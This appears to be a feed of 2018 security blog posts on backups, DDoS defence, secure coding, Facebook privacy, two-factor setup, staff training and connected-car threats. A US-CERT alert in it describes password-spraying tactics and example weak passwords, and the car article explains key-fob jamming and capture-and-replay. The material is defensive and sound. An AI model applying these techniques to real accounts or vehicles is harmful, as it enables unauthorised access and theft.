As spring blossoms into full-force, millions of people will start to shed the heavy baggage and gear that kept them warm during winter by partaking in a tried and true practice: spring cleaning. While whipping yourself into a cleaning frenzy around your home, take a moment to extend your spring cleaning efforts into your digital environments as well. And there’s no better time to kick off a digital spring cleaning than during World Backup Day.

What exactly is World Backup Day? I’m glad you asked.

In today’s day and age, data is basically digital gold. It’s imperative to ensure your information is organized and backed up—not just for peace-of-mind, but to protect yourself against potential malware and ransomware threats. Still, a large number of people have never backed up their files, leaving themselves vulnerable to losing everything. In fact, this has become such a systemic problem that a whole day has been devoted to reversing this trend: World Backup Day. One of the main goals of the World Backup Day initiative is to reach people who have never backed their data up or people who aren’t even aware that data backups are a thing, let alone a crucial security measure.

For those who may not know, a backup is a second copy of all your important files and information, everything from photos and documents to emails and passwords. Storing all of that data in one place, like a personal computer or smartphone, is a woefully unsafe practice. Creating another copy of that data through a backup will ensure that it’s stored and kept safe somewhere else should catastrophe befall your personal mobile devices, or if they’re lost or stolen.

Data loss isn’t something that only happens to huge conglomerates or to unsuspecting victims in spy movies. Every individual is susceptible to data loss or theft, and backing up that data is an easy, relatively painless step to protect all of your personal information and prevent pesky hackers from truly swiping your stuff.

Think about it—if you’re targeted by a nasty piece of ransomware but have successfully performed a data backup, there’s absolutely no need for you to pay the ransom because you have a second, secure copy of all that data. It’s a simple preventative measure that can pay off big time should worse come to worst. Even the STOP. THINK. CONNECT. campaign, dedicated to increase awareness around cybersecurity and provide information to help digital citizens protect against malware, lists regular data backups as an important security action to safeguard yourself against cybercrime.

There are two main approaches to backing up your data: either in the cloud or on an external hard drive. A cloud-based backup solution is great for people who don’t want to actively back up their devices and data or worry about the space constraints that come with most external hard drives. Simply subscribing to one of these cloud solutions will do the trick—your device’s files and data will automatically be backed up and protected without you having to lift more than a finger. Cloud-based services typically come with a monthly fee, and you’ll need a good internet connection to access them. If your connection is wonky or the site is undergoing maintenance, it can be difficult to access your backed-up data.

With an external hard drive, you can manually back up all your data and files yourself onto a physical device that you have access to anytime, anywhere. These drives are extremely reliable and a great way to achieve data redundancy. An external hard drive doesn’t hinge on internet access like cloud-based services and is an easy fix when transferring data to a new device. However, using external hard drives requires a more hands-on approach when it comes to actually backing up your data. The responsibility falls upon you to regularly perform these backups yourself. Storage space can also pose a problem. Look for an external drive with at least a terabyte of space to accommodate all of your data, which tends to accumulate quickly.

Here are some other digital spring cleaning tips to consider this World Backup Day:

  • Play it extra safe and go both routes for a thorough backup by using an external drive and subscribing to a cloud-based solution. After all, it’s better safe than sorry when it comes to your personal data.
  • Back up data from your mobile devices onto a central laptop or personal computer for an added layer of security and protection. Then work on backing up these devices with one (or both) of the methods laid out above.
  • Have at least one backup of your initial backup as a fail-safe measure.
  • Test your ability to restore data from backups regularly to ensure your backups have been performed correctly and that they haven’t been compromised.
  • Back up your data with a process and system that’s simple and works best for you—there’s no need to over complicate it!

Interested in learning more about IoT and mobile security tips and trends? Follow @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post Kick Off Your Digital Spring Cleaning Efforts During World Backup Day appeared first on McAfee Blogs.

High Level Lessons – Enterprise Security Weekly #85

This week, Paul is joined by our very own Keith Hoodlet to review the book The Phoenix Project! In the news, we have updates from Cisco, Distil Networks, BeyondTrust, Cambridge Analytica, and more on this episode of Enterprise Security Weekly!


Full Show Notes:


Visit for all the latest episodes!

DDoS attacks and impacts on various cloud computing components

Cloud computing is the subject of the era and is the current keen domain of interest of organizations. Therefore, the future outlook of this technology is optimisticly considered to be widely adapted in this domain. On the other hand, moving to cloud computing paradigm, new security mechanism and defense frameworks are being developed against all threats and malicious network attacks that threaten the service availability of cloud computing for continuity of public and private services. Considering the increasing usage of cloud services by government bodies poses an emerging threat to e-government and e-governance structures and continuity of public services of national and local government bodies. IoT, industry 4.0, smart cities and novel artificial intelligence applications that require devices to be connected and ever present cloud platforms, provide an increasing wide range of potential zombie armies to be used in Distributed Denial of Service (DDoS) attacks which are omongst the most critical attacks under cloud computing environment. In this survey, we have introduced the recent reports and trends of this attack and its effects on the service availability on various cloud components. Furthermore, we discuss in detail the classification of DDoS attacks threatening the cloud computing components and make analysis and assessments on the emerging usage of cloud infrastructures that poses both advantages and risks. We assert that considering various kinds of DDoS attack tools, proactive capabilities, virtual connecting infrastructures and innovative methods which are being developed by attackers very rapidly for compromising and halting cloud systems, it is of crucial importance for cyber security strategies of both national, central and local government bodies to consider pertinent preemptive countermeasures periodically and revise their cyber strategies and action plans dynamically.

It’s Complicated – Operational Security for Developers

Application complexity and porosity

The life of a commercial software developer is a difficult one. Or at least we have to assume it is because of how many of them half-ass it when code starts to get complicated.

Okay, maybe that’s unfair. Maybe it’s not all half-assing. It’s complicated. Literally.

There’s many functions that are overly complex. They are so complex with so many variables and interactions as to be actually untestable.

This is the 4th article of a pragmatic series to help you understand security in new and practical ways that you can apply immediately to improve software. So check back regularly and get a new story or learn about software security, whichever, and be sure to take the little quiz at the end. Somebody once forgot the quiz and a bad thing happened as an indirect result. Don’t let that happen to you.

Furthermore, coding security into these complex applications can also prevent the testing of the security. Especially if part of that security is to encrypt, obfuscate, or separate the app code from reverse engineering. This creates code that may be more secure but untestable and unmaintainably secure. That means that any changes to the software will be untestable and the security functions will be unverifiable.

And by code being unmaintainably secure, you run into the problem where it becomes really difficult to know what certain parts of the code even do. Besides being a bugfix issue, it’s a continuity issue since you can’t pass it off to other developers should the original developer leave. Because of that you end up seeing blocks of code separated into little cages by comments that says, “Don’t know what this does but if you delete it then everything will stop working. DON’T DELETE!!!”

Which brings us to the first point of security. Security is a function of separation. Either the separation between an asset and any threats exists or it does not. There are only 3 logical and proactive ways to create this separation:

  1. Move the asset to create a physical or logical barrier between it and the threats.
  2. Change the threat to a harmless state.
  3. Destroy the threat.

There is a fourth, which is destroy the asset, but that’s not really logical for business so let’s put that one aside.

In creating software, the concentration is often on the first and second means of separation. First, we choose environments where certain threats cannot exist and can then classify the software as “internal” or “not for high-risk environments”. This way its use outside of the classification is supposedly the choice of the user. However, this concept has fallen out of favor over the years as increased inter-connectivity (intended or not) has dropped perimeter security all the way back to the application itself and applications have become gateways. For example, a browser is an interactive gateway with many untrusted systems and no perimeter security therefore no classification as “internal only” can help protect it.

In the second, software designers are looking to filter interactions so that anything which can harm the environment or the application is removed. This is a means of changing the threat to a harmless state. However, this requires untrusted interaction with the filter, also a part of the program, and therefore increases the attack surface of the application. This is one of those cases where assuring the filter doesn’t share resources with the application it’s protecting. Additionally it's not possible to know what the threats are or all the possible types of attacks because we can't know all possible motivations. Therefore applications need to focus on what it can accept and this is known as whitelisting.

In whitelisting, we choose what we want or can work with from an interaction. So instead of filtering out the bad, we select the useful (good and bad intentions are currently difficult to discern before an attack so they have no function in a passive filter) from an interaction and change or ignore the rest. So if all elements of the interaction don’t match those in the whitelist the proper reaction is to change them to what is accepted (sanitize) or drop the whole interaction (fail safely).

But maybe you realize you’re making a whole lot more filters then you want to. Or maybe you realize that whitelist filters just aren’t possible. So maybe you should think about what untrusted interactions should be allowed from the start. Doing this is how you begin to simplify securing complex applications.

Application Porosity

Separation is a powerful security tactic but only if it’s applied correctly. It’s strongest when used as a preventative rather than a control. That means it’s better to not have an interaction than have it and need to control it.

Therefore when applying security to applications we need to see where there is the possibility for interaction and where there is not. We know some, all, or even none of these interactions may be required for operations. Like doors into a building, some of the doors are needed for customers and others for workers. However, each door is an interactive point which can increase both necessary operations and unwanted ones, like theft. In software, interactions can occur with users and systems, both trusted and untrusted, but also between the application and system components such as memory, keyboard, peripherals like printers and USB devices, and the hard drive.

All these interactive points together are known as the porosity and it’s what operational security is all about. I’m sure you’ve heard of opsec, right? It’s securing the stuff in motion, like a compiled or running application to assure a separation between a threat and an asset.

The porosity consists of 3 elements: Visibility, Access, and Trust, which further describes its function in these interactions so that the appropriate controls can be put in place. This is extremely important because security controls all match to specific protections of interactions. For example, the Confidentiality control which includes Encryption and Obfuscation, among other things, cannot prevent the message from getting stolen, changed, or destroyed. It can only delay in its getting read. Therefore if the goal is to protect the message, adding encryption will only protect it from one type of threat, the getting read part.

To apply the concept of porosity to coding, address the following:

  • What input do you trust? Do you take data directly from a user, hard-disk, memory, or network or do you select only the data you want to from the input to act on? Trusting even indirect input such as what the program placed in memory and on the hard disk is to ignore that resources can be replaced or snooped on in an environment outside the application.
  • Do you expect global limits within your environment? Environments can be changed outside the application and if protecting the whole environment is not in the scope of the application then the environment needs to be consistently defined as well as the means to constantly measure the state of the environment. Buffer overruns are the common occurrence of overloading a strict environment. These overflows don't need to be a mismanagement of the buffer environment but rather they could be the result of attacks made to shrink or limit the buffer environment outside the application so that when the input is written to buffer, it overflows, possibly performing malicious operations.
  • Address what is Visible, where direct Access is allowed, and what can be Trusted. Consider the environment. In a shared environment, such as a desktop, there is no trust possible as the application is just one of many residing on a foreign system. If the environment is a server, there is more trust allowed as users have less opportunity to insert or interact with other applications, hard drive, or memory. However there are exploits which take advantage of one known application on a server with an input weakness to attack another application on that same server. Be in constant awareness of the environment.

On a final note, we didn’t cover the “destroy the threat” part of logical separation. It wasn’t because we ran out of time. It’s because even if you can detect and respond to a threat, it’s an active defensive mechanism that can go badly if you’re not careful. Things like this are not easy to automate and unless you’re developing a security product, it’s better not in the application at all. For example, IP jailing and account lock-outs are commonly used however when applied to untrusted users over the Internet you need to be sure that the mechanism can’t be used to cause a denial of service attack against a legitimate user. In one case, the developer didn’t allow the mechanism to whitelist specific IPs that could not be blocked and an attacker forged the IP address of the gateway router from the organization and they blocked themselves from all traffic to the application.

Application development will get complicated at times. It’s important that in order to assure a good level of security, especially when an application is getting so large and complex as to be untestable or unmaintainable that you address it from a porosity viewpoint. This will greatly simplify building security into the application by looking at where the application interacts with the outside world. That’s the porosity. In the immortal words of me that I just made up right now to prove my point by throwing down a wise saying that applies to porosity:

“It’s how we are on the inside that matters to us but it’s how we are on the outside that matters to everyone else.”


Quiz – answer in the comments section and gain the respect and envy of your peers!

1. If your application is intended to be used in internal environments only, do you still need to sanitize interactions over the network and why?

2. You create a sanitizing whitelist for your application but the list itself is the current list of users. How can you utilize this list from the user database without sharing it as a resource?

3. Your web application allows logins from users over the Internet so how do you prevent brute-force and dictionary password attacks of your users?

We Like Straight Talk – Business Security Weekly #79

Dan Wheatley, Partner and CEO at Straight Talk Agency, joins us for the interview this week. Tenable hires Morgan Stanley, Sift Science raised $53M Series D, and Virsec raised $24M Series B. This segment is about the companies making news with founding rounds, exits, and other impacts you need to know about in the industry.


Full Show Notes:


Visit for all the latest episodes!

#DeleteFacebook: Do You Really Need To?

Is it time to #deleteFacebook? Facebook’s long line of dramas has many of us rethinking our dependence on Mark Zuckerberg’s largest social media platform. While many of us were alarmed at the fake news allegations last year, the recent scandal with Cambridge Analytica has us genuinely spooked and now asking ourselves this question.

The fact that Facebook allowed British data analysis firm Cambridge Analytica to tap the Facebook profiles of more than 50 million users without their knowledge has many of us questioning both our – and our children’s – relationship with the social media platform. How compromised is our privacy? What’s really happening with our data? Is our every online move really being monitored?

The immediate reaction of many is to delete their Facebook accounts and insist their kids do the same. When news broke of the Cambridge Analytica scandal, the #deleteFacebook hashtag trended heavily on Twitter. Many high profile tech types deleted their personal and business Facebook accounts and, consequently, drove the Twittersphere into a frenzy.

To #DeleteFacebook Or Not To #DeleteFacebook?

But many of us can’t really afford to be idealists. Some of us run online businesses and rely heavily on Facebook. Others use Facebook for our jobs. Many of us (and our kids) use Facebook to run our social lives – organise events and parties, remember birthdays and stay in touch with friends and family across the world. And for nearly all of us, it is our digital scrapbook that preserves our important life events, shared moments and memories. In short, we would be lost without it.

While the black and white idealist in me absolutely agrees that we should delete Facebook, the realist in me acknowledges that life is often lived in the shades of grey. Facebook has spent more than a decade making itself a deeply entrenched part of our modern society. Saying farewell to this part of your life is a decision that I believe many of us would find almost impossible to make.

So, while deleting Facebook from your online life is the most drastic way of protecting your data, there are steps you can take to keep your account more secure and your personal information more private. Here are my top recommendations:

  1. Set up new logins for each app you are using.

    Setting up a new login and password for each app you’re using is a great way to protect yourself and your data online. Login may take fractionally longer but it will help ensure your data is not shared between different services.

  2. Review your third party apps – the ones you joined using Facebook.

    Facebook has made it just so easy for us to download apps using our Facebook settings that many of us have acquired quite the collection of apps. The problem is that Facebook provides these apps with our data including our name, location, email or even our friends list. So, review these apps, people! Not sure where to start? Go to Settings > Apps > Logged in with Facebook and remove anything that doesn’t absolutely need access to your Facebook profile. You will still have to contact the app developer to ensure they have deleted the data they already have gathered on you. Tedious but worth it!

  3. Don’t overshare on social media.

    Oversharing online gets many of us including our kids into trouble and allows cybercriminals and ‘data analysis types’ the ability to form an accurate picture of us very quickly! Being conscious of what is publicly available from your social media profiles is essential. Ensure every member of the family knows to NEVER share their telephone number, address or details of their school online. Also rethink whether you really want your relationship status made public, or the city of your birth.

  4. Cull your Friends list.

    The Cambridge Analytica scandal should provide us all with a reality check about how we manage online friends. In 2015, an app entitled ‘this is your digital life’ was developed by Cambridge Professor Dr Aleksandr Kogan and then downloaded by 270,000 users. Those who opted in allowed the app access to their information – including their friends – which then gave Kogan access to the data of over 50 million Facebook users. Facebook have reportedly since changed their terms of service and claim app developers can no longer access this detail, or at least, not at the same level of detail. So, go through your friend list and delete those you barely know or who were just passing acquaintances. Do you really want to share your personal or family updates with these people?

  5. Choose a different social media platform to connect to apps.

    If an app lets you choose which account you use to login, pick one which holds limited data about its users. Twitter could be a good choice as it tends to hold less personal information about you.

And while I salute those who are bold enough to #deleteFacebook and insist their kids do so, I know that it isn’t for me. I choose to stay. I’ll navigate my way around the risks and flaws, so I can enjoy the upside – belonging to my community, keeping my job and adding to my digital scrapbook.

Till next time,

Alex x

The post #DeleteFacebook: Do You Really Need To? appeared first on McAfee Blogs.

Banks in Denial over Their Resilience to DDoS attacks

Are retail and investment banks in denial about being adequately protected from the frequent advanced DDoS attacks they’re getting hit with today? It is mid-March 2018 – just three months into the year and 3 major banks have already been taken offline by DDoS attacks, making global headlines. Reuters reported that ABN Amro, ING and Rabobank were targeted by hackers, temporarily disrupting online and mobile banking services at the end of January (Reuters Jan 29, 2018 Dutch tax office, banks hit by DDoS cyber attacks). Whatever DDoS attack protection they had in place proved to be insufficient.

So why are today’s DDoS attacks so successful against well-heeled financial institutions who spend more on cyber-security than most organizations spend on IT in total? The problem may lie with the “protection gap” within banks’ legacy DDoS attack protection solutions that have evolved over the last 20 years but focus principally on defending against large volumetric DDoS attacks. Banks typically rely on two DDoS architectural components:

Cloud DDoS Mitigation for elastic scalability during large volumetric attacks, and

Web Application Firewalls (WAFs) for encrypted traffic and to provide confidentiality and integrity for encrypted “Layer 7” banking applications

Legacy DDoS attack defenses often lack the automation required to provide real-time mitigation of today’s short-duration DDoS attacks. Corero’s analysis shows that even the largest banks frequently have this protection gap and it is the Achilles’ heel within their DDoS defenses.

From the Verizon DBIR graph below we see that Financial Services organizations are twice as likely to be hit with a DDoS attack than any other industry. Despite this fact, the protection gap paradox suggests that banks remain either in ignorance or denial and, consequently, haven’t adjusted their DDoS defenses to be resilient to the short, sharp DDoS attacks that dominate today. Corero’s primary research shows that, in 2017, 96% of DDoS attacks were less than 5 Gbps and 71% lasted 10 minutes or less.

DDoS Industry

2017 Verizon Data Breach Investigations Report (DBIR)

Protecting all IP addresses presents economic and compliance challenges for banks using this legacy DDoS attack prevention architecture:

  • Always-on cloud DDoS mitigation across all IP address ranges is eye-wateringly expensive, so even wealthy banks tend not to cover all IP addresses - leaving some of their IP addresses unprotected against DDoS attacks.
  • To cover encrypted traffic, they are required to surrender crypto-keys which risks personal data protection regulation non-compliance.

These challenges effectively create a “Catch 22” scenario where these banks can’t be fully protected even by always-on cloud DDoS defenses.

Consumers now demand and regulations require that banks (and other enterprises) keep their services available with zero downtime and that personal data privacy is guaranteed. As the Dutch experience has demonstrated, modern DDoS cyber-attacks pose a serious threat to both service availability and data security. Consequently, banks are at risk from trading outages, punitive regulatory fines, and customer churn.

There is good news for banks. Corero’s SmartWall® Threat Defense System can supplement their existing defenses to deliver fully automated, real-time protection against today’s DDoS attacks. SmartWall mitigates both the short, sharp attacks and the larger attacks including amplification attacks that exploit the recently publicized “Memcached” vulnerability. Learn more

TA18-086A: Brute Force Attacks Conducted by Cyber Actors

Original release date: March 27, 2018 | Last revised: March 28, 2018

Systems Affected

Networked systems


According to information derived from FBI investigations, malicious cyber actors are increasingly using a style of brute force attack known as password spraying against organizations in the United States and abroad.

On February 2018, the Department of Justice in the Southern District of New York, indicted nine Iranian nationals, who were associated with the Mabna Institute, for computer intrusion offenses related to activity described in this report. The techniques and activity described herein, while characteristic of Mabna actors, are not limited solely to use by this group.

The Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) are releasing this Alert to provide further information on this activity.


In a traditional brute-force attack, a malicious actor attempts to gain unauthorized access to a single account by guessing the password. This can quickly result in a targeted account getting locked-out, as commonly used account-lockout policies allow three to five bad attempts during a set period of time. During a password-spray attack (also known as the “low-and-slow” method), the malicious actor attempts a single password against many accounts before moving on to attempt a second password, and so on. This technique allows the actor to remain undetected by avoiding rapid or frequent account lockouts.

Password spray campaigns typically target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols. An actor may target this specific protocol because federated authentication can help mask malicious traffic. Additionally, by targeting SSO applications, malicious actors hope to maximize access to intellectual property during a successful compromise. 

Email applications are also targeted. In those instances, malicious actors would have the ability to utilize inbox synchronization to (1) obtain unauthorized access to the organization's email directly from the cloud, (2) subsequently download user mail to locally stored email files, (3) identify the entire company’s email address list, and/or (4) surreptitiously implements inbox rules for the forwarding of sent and received messages.

Technical Details

Traditional tactics, techniques, and procedures (TTPs) for conducting the password-spray attacks are as follows:

  • Using social engineering tactics to perform online research (i.e., Google search, LinkedIn, etc.) to identify target organizations and specific user accounts for initial password spray
  • Using easy-to-guess passwords (e.g., “Winter2018”, “Password123!”) and publicly available tools, execute a password spray attack against targeted accounts by utilizing the identified SSO or web-based application and federated authentication method
  • Leveraging the initial group of compromised accounts, downloading the Global Address List (GAL) from a target’s email client, and performing a larger password spray against legitimate accounts
  • Using the compromised access, attempting to expand laterally (e.g., via Remote Desktop Protocol) within the network, and performing mass data exfiltration using File Transfer Protocol tools such as FileZilla

Indicators of a password spray attack include:

  • A massive spike in attempted logons against the enterprise SSO portal or web-based application;
    • Using automated tools, malicious actors attempt thousands of logons, in rapid succession, against multiple user accounts at a victim enterprise, originating from a single IP address and computer (e.g., a common User Agent String).
    • Attacks have been seen to run for over two hours.
  • Employee logons from IP addresses resolving to locations inconsistent with their normal locations.

Typical Victim Environment

The vast majority of known password spray victims share some of the following characteristics [1][2]:

  • Use SSO or web-based applications with federated authentication method
  • Lack multifactor authentication (MFA)
  • Allow easy-to-guess passwords (e.g., “Winter2018”, “Password123!”)
  • Use inbox synchronization, allowing email to be pulled from cloud environments to remote devices
  • Allow email forwarding to be setup at the user level
  • Limited logging setup creating difficulty during post-event investigations


A successful network intrusion can have severe impacts, particularly if the compromise becomes public and sensitive information is exposed. Possible impacts include:

  • Temporary or permanent loss of sensitive or proprietary information;
  • Disruption to regular operations;
  • Financial losses incurred to restore systems and files; and
  • Potential harm to an organization’s reputation.


Recommended Mitigations

To help deter this style of attack, the following steps should be taken:

  • Enable MFA and review MFA settings to ensure coverage over all active, internet facing protocols.
  • Review password policies to ensure they align with the latest NIST guidelines [3] and deter the use of easy-to-guess passwords.
  • Review IT helpdesk password management related to initial passwords, password resets for user lockouts, and shared accounts. IT helpdesk password procedures may not align to company policy, creating an exploitable security gap.
  • Many companies offer additional assistance and tools the can help detect and prevent password spray attacks, such as the Microsoft blog released on March 5, 2018. [4]

Reporting Notice

The FBI encourages recipients of this document to report information concerning suspicious or criminal activity to their local FBI field office or the FBI’s 24/7 Cyber Watch (CyWatch). Field office contacts can be identified at CyWatch can be contacted by phone at (855) 292-3937 or by e-mail at When available, each report submitted should include the date, time, location, type of activity, number of people, and type of equipment used for the activity, the name of the submitting company or organization, and a designated point of contact. Press inquiries should be directed to the FBI’s national Press Office at or (202) 324-3691.


Revision History

  • March 27, 2018: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Protecting Yourself from a Data Breach Requires Two Step Authentication

Have you ever thought about how a data breach could affect you personally? What about your business? Either way, it can be devastating. Fortunately, there are ways that you can protect your personal or business data, and it’s easier than you think. Don’t assume that protecting yourself is impossible just because big corporations get hit with data breaches all of the time. There are things you can do to get protected.

  • All of your important accounts should use two-factor authentication. This helps to eliminate the exposure of passwords. Once one of the bad guys gets access to your password, and that’s all they need to access your account, they are already in.
  • When using two-factor authentication, you must first enter your password. However, you also have to do a second step. The website sends the owner of the account a unique code to their phone also known as a “one time password”. The only way to access the account, even if you put the password in, is to enter that code. The code changes each time. So, unless a hacker has your password AND your mobile phone, they can’t get into your account.

All of the major websites that we most commonly use have some type of two-factor authentication. They are spelled out, below:


The two-factor authentication that Facebook has is called “Login Approvals.” You can find this in the blue menu bar at the top right side of your screen. Click the arrow that you see, which opens a menu. Choose the Settings option, and look for a gold colored badge. You then see “Security,” which you should click. To the right of that, you should see Login Approvals and near that, a box that says “Require a security code.” Put a check mark there and then follow the instructions. The Facebook Code Generator might require a person to use the mobile application on their phone to get their code. Alternatively, Facebook sends a text.


Google also has two-factor authentication. To do this, go to, and then look for the blue “get started’ button. You can find it on the upper right of the screen. Click this, and then follow the directions. You can also opt for a text or a phone call to get a code. This also sets you up for other Google services, including YouTube.


Twitter also has a form of two-factor authentication. It is called “Login Verification.” To use it, log in to Twitter and click on the gear icon at the top right of the screen. You should see “Security and Privacy.” Click that, and then look for “Login Verification” under the Security heading. You can then choose how to get your code and then follow the prompts.


PayPal has a feature known as “Security Key.” To use this, look for the Security and Protection section on the upper right corner of the screen. You should see PayPal Security Key on the bottom left. Click the option to “Go to register your mobile phone.” On the following page, you can add your phone number. Then, you get a text from PayPal with your code.


Yahoo uses “Two-step Verification.” To use it, hover over your Yahoo avatar, which brings up a menu. Click on Account Settings and then on Account Info. Then, scroll until you see Sign-In and Security. There, you will see a link labeled “Set up your second sign-in verification.” Click that and enter your phone number. You should get a code via text.


The system that Microsoft has is called “Two-step Verification.” To use it, go to the website Look for the link on the left. It goes to Security Info. Click that link. On the right side, click Set Up Two-Step Verification, and then follow the prompts.


Apple also has something called “Two-Step Verification.” To use it, go to On the right is a blue box labeled Manage Your Apple ID. Hit that, and then use you Apple ID to log in. You should then see a link for Passwords and Security. You have to answer two questions to access the Security Settings area of the site. There, you should see another link labeled “Get Started.” Click that, and then enter your phone number. Wait for your code on your mobile phone, and then enter it.


LinkedIn also has “Two-Step Verification.” On the LinkedIn site, hover your mouse over your avatar and a drop-down menu should appear. Click on Privacy and Settings, and then click on Account. You should then see Security Settings, which you should also click. Finally, you should see the option to turn on Two-Step Verification for Sign-In. Turn that on to get your code.

These are only a few of the major sites that have two-step verification. Many others do, too, so always check to see if your accounts have this option. If they don’t, see if there is another option that you can use in addition to your password to log in. This could be an email or a telephone call, for instance. This will help to keep you safe.


Amazon’s Two-Step Verification adds an additional layer of security to your account. Instead of simply entering your password, Two-Step Verification requires you to enter a unique security code in addition to your password during sign in.

Without setting up Two Step authentication for your most critical accounts, all a criminal needs is access to your username, which is often your email address and then access data breach files containing billions of passwords that are posted all over the web. Once they search your username/email for the associated password, they are in.

Two factor locks them out.

Robert Siciliano personal security and identity theft expert and speaker is the author of 99 Things You Wish You Knew Before Your Identity Was Stolen. See him knock’em dead in this identity theft prevention video.

Is Your Small Business Staff Trained in Security Awareness?

The Ponemon Institute released a shocking statistic: about 80% of all corporate data leaks is due to human error. In other words, it only takes a single staff member to cause a huge issue. Here’s a scenario: Let’s say that you have an employee, Betty. Betty is lovely. We love Betty. But when Betty is checking her personal email during her lunch break and sees she has an offer that promises a 10-pound weight loss in only a week, she clicks the link. She wants to learn more about it, so she clicks the link in the email. What she doesn’t realize is that by clicking that link, she just installed a virus onto the computer. In addition, the virus now has access to your company’s network.

This was a very simple act, one that most of us do every day. However, this is why it is so important that your staff is up to date on security awareness. How can you do this? Here are some tips:

  • Present your staff with information about being aware of security, and then come up with a set up where you send them a link they want to click on. This is a process known as “phishing simulation.” If your staff members click on the links, and they probably will, it will take them to a safe page. However, on the page is a message telling them that they fell for a scam, and though they are safe this time, there could be great repercussions.
  • The staff members who click the link should be tested again. This way, you will know if the message got through.
  • Make sure when you give these tests that it isn’t predictable. Send the emails at different times of day and make sure they look different and have a different message. For instance, don’t send the “lose 10 pounds” email twice.
  • Think about hiring someone, a stranger, who will try to get your staff to give them sensitive information about your company over the phone, through email, or even in person. This is a valuable test, as it helps you to determine who the “weak links” are in your company.
  • Give your staff quizzes throughout the year to see who is paying attention to security.
  • You should focus on education, not discipline, when you are doing this. Don’t make them feel bad or punish them. Instead, make sure they know what they did wrong and work on not doing it again.
  • Ensure that your team knows that a data breach can also result in financial, legal, and criminal problems.
  • Schedule checks of workstations to see if any employee is doing something that might compromise your company’s sensitive data. This includes leaving information on a screen and walking away.
  • Explain the importance of security to your staff, and encourage them to report any activity that seems suspicious.
  • After training and testing your staff, make a list of all concepts that you want them to understand. Look at this list often, and then evaluate it time and time again to see if anything needs changed.
  • Don’t forget company officers. When company officers are omitted from this kind of training it poorly reflects on the organization. Some security personnel are afraid to put their Executives on the spot. That is a huge mistake. Security starts from the top.

Remember, there is nothing wrong with sharing tips with your staff. Post them around the office and keep reminding them to stay vigilant. This helps the information to remain fresh in their minds, and helps you to recognize those who are taking security, seriously.

Robert Siciliano personal security and identity theft expert and speaker is the author of 99 Things You Wish You Knew Before Your Identity Was Stolen. See him knock’em dead in this identity theft prevention video.

Today’s Connected Cars Vulnerable to Hacking, Malware

The McAfee Advanced Threat Research team recently published an article about threats to automobiles on the French site Connected cars are growing rapidly in number and represent the next big step in personal transportation. Auto sales are expected to triple between 2017 and 2022, to US$155.9 billion from $52.5 billion, according to PwC France. Realizing this increase is a huge challenge for car companies as well as for IT security firms.

Through multiple added functions, from Wi-Fi and external connections to driving assistance and autonomous operations, connected cars will very soon need strong security to avoid any intrusions that could endanger drivers, passengers, and others.

Security Risks

Modern cars are exposed to security risks just as are other connected devices. Let’s look at current and future threats in the automotive security field.

The following diagram shows the main risks: 


Personal Data and Tracking

Connected cars record a lot of information about their drivers. This information can come from an external device connected to the car, such as a phone, and can include contact details, SMS and calls history, and even musical tastes. A car can also record shifting patterns and other driver’s habits that could be used to create a picture of a driver’s competence. This kind of oversight could aid insurance companies when offering coverage, for example.

With personal data now considered the new gold, all of this information represents a valuable target for cybercriminals as well as companies and governments.

  • Cybercriminals can use this stolen information for financial compensation and identity theft
  • Companies can use this information for marketing or insurance contracts
  • Governments can use this information for spying on and tracking people

Faked Car Data

Digital information can be modified and faked. By altering data such as pollution tests or performance, companies can take advantage of the results to increase sales. Similarly, drivers could modify car statistics such as distance traveled to fool insurance companies or future buyers.

Car Theft and Key Fob Hacking

Key fob hacking is a technique to allow an intruder to enter a car without breaking in. This technique is widely known by attackers and can be done easily with cheap hardware. The attack consists of intercepting the signal from a wireless key to either block the signal to lock the car or replay the signal to gain access.

One variant of the attack uses a jammer to block the signal. The jammer interferes with the electromagnetic waves used to communicate with the vehicle, blocking the signal and preventing the car from locking, leaving access free to the attacker. Some jammers have a range of more than 500 meters.

Key fob jammer.

Another attack intercepts the signal sent by the key and replays it to open the door. Auto manufacturers protect against this kind of attack by implementing security algorithms that avoid simple replays with same signal. Each signal sent from the key to the car is unique, thus avoiding a replay. However, one proof of concept for this attack blocks the signal to the car and stores it. The driver’s first click on the key does not work but is recorded by the attacker. The driver’s second click is also recorded, locking the car but giving two signals to the attackers. The first signal recorded, which the car has not received, is used to unlock the door. The second signal is stored for the attacker to use later.

Entering by the (CAN) Back Door

Autos use several components to interact with their parts. Since the end of the 20th century, cars have used the dedicated controller area network (CAN) standard to allow microcontrollers and devices to talk to each other. The CAN bus communicates with a vehicle’s electronic control unit (ECU), which operates many subsystems such as antilock brakes, airbags, transmission, audio system, doors, and many other parts—including the engine. Modern cars also have an On-Board Diagnostic Version 2 (OBD-II) port. Mechanics use this port to diagnose problems. CAN traffic can be intercepted from the OBD port.

The on-board diagnostic port.

An external OBD device could be plugged into a car as a backdoor for external commands, controlling services such as the Wi-Fi connection, performance statistics, and unlocking doors. The OBD port offers a path for malicious activities if not secured.

Spam and Advertising

Adding more services to connected cars can also add more security risks. With the arrival of fully connected autos such as Teslas, which allow Internet access from a browser, it is feasible to deliver a new type of spam based on travel and geolocation. Imagine a pop-up discount as you approach a fast-food restaurant. Not only is this type of action likely to be unwanted, it could also provide a distraction to drivers. We already know spam and advertising are infection vectors for malware.

Malware and Exploits

All the ECUs in an auto contain firmware that can be hacked. Cars employ in-vehicle infotainment (IVI) systems to control audio or video among other functions. These systems are increasing in complexity.

An in-vehicle infotainment system.

MirrorLink, Bluetooth, and internal Wi-Fi are other technologies that improve the driving experience. By connecting our smartphones to our cars, we add functions such as phone calls, SMS, and music and audiobooks, for example.

Malware can target these devices. Phones, browsers, or the telecommunication networks embedded in our cars are infection vectors that can allow the installation of malware. In 2016, McAfee security researchers demonstrated a ransomware proof of concept that blocked the use of the car until the ransom was paid.

A proof-of-concept IVI ransomware attack on a vehicle.

The ransomware was installed via an over-the-air system that allowed the connection of external equipment.

Third-Party Apps  

Many modern cars allow third parties to create applications to further connected services. For example, it is possible to unlock or lock the door from your smartphone using an app. Although these apps can be very convenient, they effectively open these services to anyone and can become a new attack vector. It is easier to hack a smartphone app than a car’s ECU because the former is more affordable and offers many more resources. Car apps are also vulnerable because some third parties employ weak security practices and credentials are sometimes stored in clear text. These apps may also store personal information such as GPS data, car model, and other information. This scenario has already been demonstrated by the OnStar app that allowed a hacker to remotely open a car.

Vehicle-to-Vehicle Communications

